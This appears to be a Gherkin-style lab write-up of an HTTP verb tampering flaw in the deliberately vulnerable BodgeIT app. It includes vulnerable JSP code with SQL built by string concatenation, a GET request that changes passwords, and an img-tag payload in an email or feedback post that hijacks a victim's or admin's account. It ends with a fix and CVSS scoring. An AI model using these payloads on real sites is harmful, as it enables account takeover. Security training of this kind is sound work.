## Version 1.4.1
## language: en

Feature:
  TOE:
    BodgeIT
  Category:
    Insecure Resource Access
  Location:
    bodgeit/password.jsp - HTTP Method
  CWE:
    CWE-0650: Trusting HTTP Permission Methods on the Server Side -variant-
      https://cwe.mitre.org/data/definitions/650.html
    CWE-0436: Interpretation Conflict -base-
      https://cwe.mitre.org/data/definitions/436.html
    CWE-0435: Improper Interaction Between Multiple Correctly-Behaving
    Entities -class-
      https://cwe.mitre.org/data/definitions/435.html
    CWE-0002: 7PK - Environment -category-
      https://cwe.mitre.org/data/definitions/2.html
  CAPEC:
    CAPEC-274: HTTP Verb Tampering -detailed-
      https://capec.mitre.org/data/definitions/274.html
    CAPEC-220: Client-Server Protocol Manipulation -standard-
      https://capec.mitre.org/data/definitions/220.html
    CAPEC-272: Protocol Manipulation -meta-
      https://capec.mitre.org/data/definitions/272.html
  Rule:
    REQ.128: https://fluidattacks.com/web/es/rules/128/
  Goal:
    Change a user's password via external GET request
  Recommendation:
    Only allow transactions if request is of the intended type

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running BodgeIT in a docker container at
    """
    http://localhost:8000/bodgeit/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/bodgeit/password.jsp
    Then I can change my password

  Scenario: Static detection
  No input validation for unusual XSS payloads
    When I look at the code at "/bodgeit/root/password.jsp"
    """
    ...
    10  String password1 = (String) request.getParameter("password1");
    11  String password2 = (String) request.getParameter("password2");
    12  String okresult = null;
    13  String failresult = null;
    14
    15  if (password1 != null && password1.length() > 0) {
    16    if ( ! password1.equals(password2)) {
    17      failresult = "The passwords you have supplied are different.";
    18    }  else if (password1 == null || password1.length() < 5) {
    19      failresult = "You must supply a password of at least 5 characters.";
    20    } else {
    21      Statement stmt = conn.createStatement();
    22      ResultSet rs = null;
    23      try {
    24        stmt.executeQuery("UPDATE Users set password= '" + password1 + "'
    25        where name = '" + username + "'");
    26
    27        okresult = "Your password has been changed";
    ...
    """
    Then I see it doesn't check for request method in any way

  Scenario: Dynamic detection
  Verb tampering
    Given I am logged in to the site
    And intercept a password change request with Burp
    """
    POST /bodgeit/password.jsp HTTP/1.1
    Host: localhost:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/
    65.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*
    ;q=0.8
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8000/bodgeit/password.jsp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 23
    Connection: close
    Cookie: b_id=""; JSESSIONID=F1B5FFCAFC944853AFD96F38CF86ACE0
    Upgrade-Insecure-Requests: 1

    password1=12345&password2=12345
    """
    Then I try changing the method and pass parameters via URL
    """
    GET /bodgeit/password.jsp?password1=12345&password2=12345 HTTP/1.1
    ...
    """
    Then I get the response
    """
    Your password has been changed
    """
    Then I know it's vulnerable to verb tampering

  Scenario: Exploitation
  Changing a victim's password
    Given I know I can change password with GET
    Then I embed a malicious "<img>" in an email to a victim
    """
    <img src="http://bodgeit/password.jsp?password1=12345&password2=12345">
    """
    Then when they open the email, their password is changed
    And I get access to their account

  Scenario: Remediation
  Only allowing the intended method
    Given I patch the code as follows
    """
    ...
    10  String password1 = (String) request.getParameter("password1");
    11  String password2 = (String) request.getParameter("password2");
    12  String okresult = null;
    13  String failresult = null;
    14
    15  if (password1 != null && password1.length() > 0 &&
    request.getMethod().equals("POST")) {
    16    if ( ! password1.equals(password2)) {
    17      failresult = "The passwords you have supplied are different.";
    18    }  else if (password1 == null || password1.length() < 5) {
    19      failresult = "You must supply a password of at least 5 characters.";
    20    } else {
    21      Statement stmt = conn.createStatement();
    22      ResultSet rs = null;
    23      try {
    24        stmt.executeQuery("UPDATE Users set password= '" + password1 + "'
    25        where name = '" + username + "'");
    26
    27        okresult = "Your password has been changed";
    ...
    """
    Then the password can't be changed via GET anymore

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.3/10 (High) - AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.7/10 (High) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.7/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
    0079-lv-2-xss-stored
      Given I post a feedback with an XSS payload that redirects to
      """
      http://bodgeit/password.jsp?password1=12345&password2=12345
      """
      Given I can also inject a malicious "<img>" in a feedback
      Then when the admin goes into their dashboard
      Then their password is changed and I have access to an admin account

